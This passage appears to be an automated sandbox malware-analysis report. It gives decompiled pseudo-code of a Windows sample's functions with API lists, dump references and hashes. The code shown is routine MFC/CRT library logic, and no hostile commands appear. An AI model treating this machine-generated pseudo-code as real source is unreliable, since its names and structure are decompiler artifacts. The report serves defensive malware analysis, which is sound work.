                                                                                                                            0x00409e68
                                                                                                                            0x00409e6d
                                                                                                                            0x00409e72
                                                                                                                            0x00409e7d
                                                                                                                            0x00000000
                                                                                                                            0x00409e7d
                                                                                                                            0x00409e83

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessagePost
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 410705778-0
                                                                                                                            • Opcode ID: 4ea9a7c4355c8ef75195bd247fe569124dfed557ba019501ae1ab97f8a4e3403
                                                                                                                            • Instruction ID: 5dc9eab2e2a1796073f50f4568277152dbaa991dc3d51f78506c527dc5223310
                                                                                                                            • Opcode Fuzzy Hash: 4ea9a7c4355c8ef75195bd247fe569124dfed557ba019501ae1ab97f8a4e3403
                                                                                                                            • Instruction Fuzzy Hash: 03D09EB1610100AFE741DF38CD4493677A9FB54719354556DB855CA2A2D336DC13CB14
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004048A3 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 79%
                                                                                                                            			E004048A3(intOrPtr* __ecx, int _a4) {
				int _t8;
				intOrPtr* _t12;

				_t12 = __ecx;
				if(( *(__ecx + 0x3c) & 0x00000018) != 0) {
					_push(_a4);
					 *((intOrPtr*)( *__ecx + 0x84))();
				}
				_t8 = EndDialog( *(_t12 + 0x20), _a4); // executed
				return _t8;
			}





                                                                                                                            0x004048a4
                                                                                                                            0x004048aa
                                                                                                                            0x004048ac
                                                                                                                            0x004048b2
                                                                                                                            0x004048b2
                                                                                                                            0x004048bf
                                                                                                                            0x004048c6

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Dialog
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1120787796-0
                                                                                                                            • Opcode ID: 86eab75527ac1422a81680437d01bc005308af884bd049115e579e05e8c075ab
                                                                                                                            • Instruction ID: fe29bf4375fcd6608537b10db8fafc4573faa105f8f50cc3ae9f8b6245e4db0c
                                                                                                                            • Opcode Fuzzy Hash: 86eab75527ac1422a81680437d01bc005308af884bd049115e579e05e8c075ab
                                                                                                                            • Instruction Fuzzy Hash: 8BD0523A004202AFC722AB18C808A86BFE0BF59351F05C87ABAC982931CB719C109B80
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041E2DF Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 25%
                                                                                                                            			E0041E2DF(intOrPtr _a4) {
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t6;
				void* _t9;

				_push(0);
				_push(0);
				_push(_a4);
				_t2 = E0041E211(_t3, _t4, _t5, _t6, _t9); // executed
				return _t2;
			}









                                                                                                                            0x0041e2df
                                                                                                                            0x0041e2e1
                                                                                                                            0x0041e2e3
                                                                                                                            0x0041e2e7
                                                                                                                            0x0041e2ef

                                                                                                                            APIs
                                                                                                                            • _doexit.LIBCMT ref: 0041E2E7
                                                                                                                              • Part of subcall function 0041E211: __lock.LIBCMT ref: 0041E21F
                                                                                                                              • Part of subcall function 0041E211: __decode_pointer.LIBCMT ref: 0041E24E
                                                                                                                              • Part of subcall function 0041E211: __decode_pointer.LIBCMT ref: 0041E25B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __decode_pointer$__lock_doexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3276244213-0
                                                                                                                            • Opcode ID: 44ea3af290a5c0fced421c48bee69f607f8ea4075bd654cc3defe53151bfea1d
                                                                                                                            • Instruction ID: 1d35496f795b128c13403aec307932bea6caa44d1379d25044dbc17b24762cfa
                                                                                                                            • Opcode Fuzzy Hash: 44ea3af290a5c0fced421c48bee69f607f8ea4075bd654cc3defe53151bfea1d
                                                                                                                            • Instruction Fuzzy Hash: FBA02238AC03003AEA202302BC03F0833802B80F00FF080A8BE08380E0B3BB2328800F
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00418C57 Relevance: 12.1, APIs: 8, Instructions: 129filestringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 87%
                                                                                                                            			E00418C57(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t38;
				long _t49;
				CHAR* _t50;
				CHAR* _t56;
				CHAR* _t59;
				void* _t61;
				int _t65;
				CHAR* _t74;
				void* _t75;
				void* _t76;
				void* _t89;
				void* _t90;
				CHAR* _t92;
				void* _t93;
				void* _t96;
				struct _WIN32_FIND_DATAA* _t98;
				void* _t100;

				_t90 = __edx;
				_t76 = __ecx;
				_t98 = _t100 - 0x13c;
				_t38 =  *0x441590; // 0x4917eadc
				 *(_t98 + 0x140) = _t38 ^ _t98;
				_push(0x14);
				E0041E981(E00431E6D, __ebx, __edi, __esi);
				_t92 =  *(_t98 + 0x14c);
				_t74 =  *(_t98 + 0x150);
				 *((intOrPtr*)(_t98 - 0x18)) =  *((intOrPtr*)(_t98 + 0x154));
				if((0 | _t92 != 0x00000000) == 0) {
					L1:
					E0040D8B0(_t76);
				}
				if((0 | _t74 != 0x00000000) == 0) {
					goto L1;
				}
				_t49 = GetFullPathNameA(_t74, 0x104, _t92, _t98 - 0x14);
				if(_t49 != 0) {
					__eflags = _t49 - 0x104;
					if(_t49 >= 0x104) {
						goto L5;
					} else {
						E0040DB69(_t98 - 0x10, E0040E967());
						 *(_t98 - 4) =  *(_t98 - 4) & 0x00000000;
						E00418A8D(_t98, __eflags, _t92, _t98 - 0x10);
						_t56 = PathIsUNCA( *(_t98 - 0x10));
						__eflags = _t56;
						if(_t56 != 0) {
							L19:
							E00402C55( &(( *(_t98 - 0x10))[0xfffffffffffffff0]), _t90);
							_t50 = 1;
							__eflags = 1;
						} else {
							_t59 = GetVolumeInformationA( *(_t98 - 0x10), _t56, _t56, _t56, _t98 - 0x20, _t98 - 0x1c, _t56, _t56);
							__eflags = _t59;
							if(_t59 != 0) {
								__eflags =  *(_t98 - 0x1c) & 0x00000002;
								if(( *(_t98 - 0x1c) & 0x00000002) == 0) {
									CharUpperA(_t92);
								}
								__eflags =  *(_t98 - 0x1c) & 0x00000004;
								if(( *(_t98 - 0x1c) & 0x00000004) != 0) {
									goto L19;
								} else {
									_t61 = FindFirstFileA(_t74, _t98);
									__eflags = _t61 - 0xffffffff;
									if(_t61 == 0xffffffff) {
										goto L19;
									} else {
										FindClose(_t61);
										__eflags =  *(_t98 - 0x14);
										if( *(_t98 - 0x14) == 0) {
											goto L10;
										} else {
											__eflags =  *(_t98 - 0x14) - _t92;
											if( *(_t98 - 0x14) <= _t92) {
												goto L10;
											} else {
												_t65 = lstrlenA( &(_t98->cFileName));
												_t89 =  *(_t98 - 0x14) - _t92;
												__eflags = _t65 + _t89 - 0x104;
												if(_t65 + _t89 >= 0x104) {
													goto L10;
												} else {
													__eflags = 0x104 - _t89;
													E00402BAF(_t90, _t98,  *(_t98 - 0x14), 0x104 - _t89,  &(_t98->cFileName));
													goto L19;
												}
											}
										}
									}
								}
							} else {
								_push(_t74);
								E00418C2C( *((intOrPtr*)(_t98 - 0x18)));
								L10:
								E00402C55( &(( *(_t98 - 0x10))[0xfffffffffffffff0]), _t90);
								goto L5;
							}
						}
					}
				} else {
					E0040CDBE(_t98, _t92, 0x104, _t74, 0xffffffff);
					_push(_t74);
					E00418C2C( *((intOrPtr*)(_t98 - 0x18)));
					L5:
					_t50 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t98 - 0xc));
				_pop(_t93);
				_pop(_t96);
				_pop(_t75);
				return E0041D773(_t50, _t75,  *(_t98 + 0x140) ^ _t98, _t90, _t93, _t96);
			}





















                                                                                                                            0x00418c57
                                                                                                                            0x00418c57
                                                                                                                            0x00418c5e
                                                                                                                            0x00418c62
                                                                                                                            0x00418c69
                                                                                                                            0x00418c6f
                                                                                                                            0x00418c76
                                                                                                                            0x00418c81
                                                                                                                            0x00418c87
                                                                                                                            0x00418c8d
                                                                                                                            0x00418c99
                                                                                                                            0x00418c9b
                                                                                                                            0x00418c9b
                                                                                                                            0x00418c9b
                                                                                                                            0x00418ca9
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00418cb7
                                                                                                                            0x00418cbf
                                                                                                                            0x00418cde
                                                                                                                            0x00418ce0
                                                                                                                            0x00000000
                                                                                                                            0x00418ce2
                                                                                                                            0x00418ceb
                                                                                                                            0x00418cf0
                                                                                                                            0x00418cf9
                                                                                                                            0x00418d01
                                                                                                                            0x00418d07
                                                                                                                            0x00418d09
                                                                                                                            0x00418d9b
                                                                                                                            0x00418da1
                                                                                                                            0x00418da8
                                                                                                                            0x00418da8
                                                                                                                            0x00418d0f
                                                                                                                            0x00418d1f
                                                                                                                            0x00418d25
                                                                                                                            0x00418d27
                                                                                                                            0x00418d3f
                                                                                                                            0x00418d43
                                                                                                                            0x00418d46
                                                                                                                            0x00418d46
                                                                                                                            0x00418d4c
                                                                                                                            0x00418d50
                                                                                                                            0x00000000
                                                                                                                            0x00418d52
                                                                                                                            0x00418d57
                                                                                                                            0x00418d5d
                                                                                                                            0x00418d60
                                                                                                                            0x00000000
                                                                                                                            0x00418d62
                                                                                                                            0x00418d63
                                                                                                                            0x00418d69
                                                                                                                            0x00418d6d
                                                                                                                            0x00000000
                                                                                                                            0x00418d6f
                                                                                                                            0x00418d6f
                                                                                                                            0x00418d72
                                                                                                                            0x00000000
                                                                                                                            0x00418d74
                                                                                                                            0x00418d78
                                                                                                                            0x00418d81
                                                                                                                            0x00418d85
                                                                                                                            0x00418d87
                                                                                                                            0x00000000
                                                                                                                            0x00418d89
                                                                                                                            0x00418d8d
                                                                                                                            0x00418d93
                                                                                                                            0x00000000
                                                                                                                            0x00418d98
                                                                                                                            0x00418d87
                                                                                                                            0x00418d72
                                                                                                                            0x00418d6d
                                                                                                                            0x00418d60
                                                                                                                            0x00418d29
                                                                                                                            0x00418d29
                                                                                                                            0x00418d2d
                                                                                                                            0x00418d32
                                                                                                                            0x00418d38
                                                                                                                            0x00000000
                                                                                                                            0x00418d38
                                                                                                                            0x00418d27
                                                                                                                            0x00418d09
                                                                                                                            0x00418cc1
                                                                                                                            0x00418cc6
                                                                                                                            0x00418cce
                                                                                                                            0x00418cd2
                                                                                                                            0x00418cd7
                                                                                                                            0x00418cd7
                                                                                                                            0x00418cd7
                                                                                                                            0x00418dac
                                                                                                                            0x00418db4
                                                                                                                            0x00418db5
                                                                                                                            0x00418db6
                                                                                                                            0x00418dcb

                                                                                                                            APIs
                                                                                                                            • __EH_prolog3.LIBCMT ref: 00418C76
                                                                                                                            • GetFullPathNameA.KERNEL32(?,00000104,?,?,00000014), ref: 00418CB7
                                                                                                                              • Part of subcall function 0040D8B0: __CxxThrowException@8.LIBCMT ref: 0040D8C4
                                                                                                                            • PathIsUNCA.SHLWAPI(?,00000000), ref: 00418D01
                                                                                                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00418D1F
                                                                                                                            • CharUpperA.USER32(?), ref: 00418D46
                                                                                                                            • FindFirstFileA.KERNEL32(?,00000000), ref: 00418D57
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00418D63
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00418D78
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3InformationNameThrowUpperVolumelstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3249967234-0
                                                                                                                            • Opcode ID: 43f0151dc7d12061fdb417ab40a52daf60c42099108414d13a167328bc96bf2d
                                                                                                                            • Instruction ID: 8255ba6af3323d445736fb89c9b3d732b154e273edeba6289067408db4dcddd8
                                                                                                                            • Opcode Fuzzy Hash: 43f0151dc7d12061fdb417ab40a52daf60c42099108414d13a167328bc96bf2d
                                                                                                                            • Instruction Fuzzy Hash: B54172B1900209ABDB11EFB5DC45AFF7778EF14319F10052EF925E22D1EF3899848A68
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401200 Relevance: 9.1, APIs: 6, Instructions: 81windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 55%
                                                                                                                            			E00401200(void* __ecx) {
				signed int _v8;
				signed int _v12;
				int _v100;
				char _v104;
				struct tagRECT _v120;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t17;
				int _t20;
				void* _t21;
				int _t25;
				int _t26;
				void* _t43;
				void* _t45;
				void* _t46;
				void* _t48;
				void* _t59;
				void* _t62;
				void* _t63;
				void* _t66;
				void* _t68;
				void* _t69;
				void* _t70;
				signed int _t71;
				signed int _t73;

				_t73 = (_t71 & 0xfffffff8) - 0x74;
				_t17 =  *0x441590; // 0x4917eadc
				_v8 = _t17 ^ _t73;
				_push(_t45);
				_t68 = __ecx;
				_push(_t62);
				_t20 = IsIconic( *(__ecx + 0x20));
				_t74 = _t20;
				if(_t20 == 0) {
					_t21 = E00404816(_t45, _t68, _t62, _t68, __eflags);
					_pop(_t63);
					_pop(_t69);
					_pop(_t46);
					__eflags = _v8 ^ _t73;
					return E0041D773(_t21, _t46, _v8 ^ _t73, _t59, _t63, _t69);
				} else {
					E0040797D(_t45,  &_v100, _t62, _t68, _t74);
					SendMessageA( *(_t68 + 0x20), 0x27, _v100, 0);
					_t25 = GetSystemMetrics(0xb);
					_t26 = GetSystemMetrics(0xc);
					GetClientRect( *(_t68 + 0x20),  &_v120);
					_t61 =  *(_t68 + 0x74);
					asm("cdq");
					asm("cdq");
					DrawIcon(_v100, _v120.right - _v120.left - _t25 + 1 -  *(_t68 + 0x74) >> 1, _v120.bottom - _v120.top - _t26 + 1 -  *(_t68 + 0x74) >> 1, _t61);
					_t43 = E004079D1(_t25,  &_v104, _t26, _t68, _t74);
					_t66 = _t68;
					_pop(_t70);
					_pop(_t48);
					return E0041D773(_t43, _t48, _v12 ^ _t73, _t61, _t66, _t70);
				}
			}






























                                                                                                                            0x00401206
                                                                                                                            0x00401209
                                                                                                                            0x00401210
                                                                                                                            0x00401214
                                                                                                                            0x00401216
                                                                                                                            0x0040121b
                                                                                                                            0x0040121d
                                                                                                                            0x00401223
                                                                                                                            0x00401225
                                                                                                                            0x004012bb
                                                                                                                            0x004012c4
                                                                                                                            0x004012c5
                                                                                                                            0x004012c6
                                                                                                                            0x004012c7
                                                                                                                            0x004012d1
                                                                                                                            0x0040122b
                                                                                                                            0x00401230
                                                                                                                            0x00401242
                                                                                                                            0x00401250
                                                                                                                            0x00401256
                                                                                                                            0x00401263
                                                                                                                            0x00401271
                                                                                                                            0x0040127a
                                                                                                                            0x0040128d
                                                                                                                            0x00401298
                                                                                                                            0x004012a2
                                                                                                                            0x004012a7
                                                                                                                            0x004012a8
                                                                                                                            0x004012a9
                                                                                                                            0x004012b8
                                                                                                                            0x004012b8

                                                                                                                            APIs
                                                                                                                            • IsIconic.USER32 ref: 0040121D
                                                                                                                              • Part of subcall function 0040797D: __EH_prolog3.LIBCMT ref: 00407984
                                                                                                                              • Part of subcall function 0040797D: BeginPaint.USER32(?,?,00000004,0040482D,?,00000058,004012C0), ref: 004079B0
                                                                                                                            • SendMessageA.USER32 ref: 00401242
                                                                                                                            • GetSystemMetrics.USER32 ref: 00401250
                                                                                                                            • GetSystemMetrics.USER32 ref: 00401256
                                                                                                                            • GetClientRect.USER32(?,?), ref: 00401263
                                                                                                                            • DrawIcon.USER32 ref: 00401298
                                                                                                                              • Part of subcall function 004079D1: __EH_prolog3.LIBCMT ref: 004079D8
                                                                                                                              • Part of subcall function 004079D1: EndPaint.USER32(?,?,00000004,00404853,?,?,00000058,004012C0), ref: 004079F3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog3MetricsPaintSystem$BeginClientDrawIconIconicMessageRectSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2914073315-0
                                                                                                                            • Opcode ID: 08bcd4af9a871ced2556a18e2d9f37d8e47b09af36c8af1dfe47986373f5364a
                                                                                                                            • Instruction ID: 00fabc48f64a7f9132f606d7dc8cc59216392d2e03fdae37bb5dc5daafde5ef9
                                                                                                                            • Opcode Fuzzy Hash: 08bcd4af9a871ced2556a18e2d9f37d8e47b09af36c8af1dfe47986373f5364a
                                                                                                                            • Instruction Fuzzy Hash: 352183B67046045BC310EF78DD4AD6FB7E9FBC8615F044A2DF599D3290DA34E9008B96
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041D773 Relevance: 7.6, APIs: 5, Instructions: 57COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 85%
                                                                                                                            			E0041D773(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x441590; // 0x4917eadc
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x444890 = _t6;
				 *0x44488c = _t22;
				 *0x444888 = _t25;
				 *0x444884 = _t21;
				 *0x444880 = _t27;
				 *0x44487c = _t26;
				 *0x4448a8 = ss;
				 *0x44489c = cs;
				 *0x444878 = ds;
				 *0x444874 = es;
				 *0x444870 = fs;
				 *0x44486c = gs;
				asm("pushfd");
				_pop( *0x4448a0);
				 *0x444894 =  *_t31;
				 *0x444898 = _v0;
				 *0x4448a4 =  &_a4;
				 *0x4447e0 = 0x10001;
				_t11 =  *0x444898; // 0x0
				 *0x444794 = _t11;
				 *0x444788 = 0xc0000409;
				 *0x44478c = 1;
				_t12 =  *0x441590; // 0x4917eadc
				_v812 = _t12;
				_t13 =  *0x441594; // 0xb6e81523
				_v808 = _t13;
				 *0x4447d8 = IsDebuggerPresent();
				_push(1);
				E0042A832(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x436148);
				if( *0x4447d8 == 0) {
					_push(1);
					E0042A832(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                                                                                                                            0x0041d773
                                                                                                                            0x0041d773
                                                                                                                            0x0041d773
                                                                                                                            0x0041d773
                                                                                                                            0x0041d773
                                                                                                                            0x0041d773
                                                                                                                            0x0041d773
                                                                                                                            0x0041d779
                                                                                                                            0x0041d77b
                                                                                                                            0x0041d77b
                                                                                                                            0x00421fbb
                                                                                                                            0x00421fc0
                                                                                                                            0x00421fc6
                                                                                                                            0x00421fcc
                                                                                                                            0x00421fd2
                                                                                                                            0x00421fd8
                                                                                                                            0x00421fde
                                                                                                                            0x00421fe5
                                                                                                                            0x00421fec
                                                                                                                            0x00421ff3
                                                                                                                            0x00421ffa
                                                                                                                            0x00422001
                                                                                                                            0x00422008
                                                                                                                            0x00422009
                                                                                                                            0x00422012
                                                                                                                            0x0042201a
                                                                                                                            0x00422022
                                                                                                                            0x0042202d
                                                                                                                            0x00422037
                                                                                                                            0x0042203c
                                                                                                                            0x00422041
                                                                                                                            0x0042204b
                                                                                                                            0x00422055
                                                                                                                            0x0042205a
                                                                                                                            0x00422060
                                                                                                                            0x00422065
                                                                                                                            0x00422071
                                                                                                                            0x00422076
                                                                                                                            0x00422078
                                                                                                                            0x00422080
                                                                                                                            0x0042208b
                                                                                                                            0x00422098
                                                                                                                            0x0042209a
                                                                                                                            0x0042209c
                                                                                                                            0x004220a1
                                                                                                                            0x004220b5

                                                                                                                            APIs
                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 0042206B
                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00422080
                                                                                                                            • UnhandledExceptionFilter.KERNEL32(00436148), ref: 0042208B
                                                                                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 004220A7
                                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 004220AE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2579439406-0
                                                                                                                            • Opcode ID: fec83ced87a15c1fe080450da2339fd95028f726765dc8282b2b95b1a144bd48
                                                                                                                            • Instruction ID: b749804b68ed4b15e9798d44f6323906d4eba8997b792c033d94d585ebedda25
                                                                                                                            • Opcode Fuzzy Hash: fec83ced87a15c1fe080450da2339fd95028f726765dc8282b2b95b1a144bd48
                                                                                                                            • Instruction Fuzzy Hash: F221EBBC910684AFD700EFA9F8467547BE4FB9A355F51503AE90883260E3B499818F0E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040A579 Relevance: 6.0, APIs: 4, Instructions: 41keyboardwindowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 91%
                                                                                                                            			E0040A579(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t5;
				void* _t15;
				void* _t18;
				void* _t19;

				_t15 = __ecx;
				if((E0040CE51(__ecx) & 0x40000000) != 0) {
					L6:
					_t5 = E0040A0D8(_t15, _t15, _t18, _t19, __eflags);
					asm("sbb eax, eax");
					return  ~( ~_t5);
				}
				_t19 = E00402551();
				if(_t19 == 0) {
					goto L6;
				}
				_t18 = GetKeyState;
				if(GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
					goto L6;
				} else {
					SendMessageA( *(_t19 + 0x20), 0x111, 0xe146, 0);
					return 1;
				}
			}










                                                                                                                            0x0040a57c
                                                                                                                            0x0040a588
                                                                                                                            0x0040a5d0
                                                                                                                            0x0040a5d2
                                                                                                                            0x0040a5d9
                                                                                                                            0x00000000
                                                                                                                            0x0040a5db
                                                                                                                            0x0040a58f
                                                                                                                            0x0040a593
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040a595
                                                                                                                            0x0040a5a2
                                                                                                                            0x00000000
                                                                                                                            0x0040a5b6
                                                                                                                            0x0040a5c5
                                                                                                                            0x00000000
                                                                                                                            0x0040a5cd

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0040CE51: GetWindowLongA.USER32 ref: 0040CE5C
                                                                                                                            • GetKeyState.USER32(00000010), ref: 0040A59D
                                                                                                                            • GetKeyState.USER32(00000011), ref: 0040A5A6
                                                                                                                            • GetKeyState.USER32(00000012), ref: 0040A5AF
                                                                                                                            • SendMessageA.USER32 ref: 0040A5C5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: State$LongMessageSendWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1063413437-0
                                                                                                                            • Opcode ID: c87631ab6f7d4e02ba606b675060841e0d5d0f591b34118a04fe3658d4926cc6
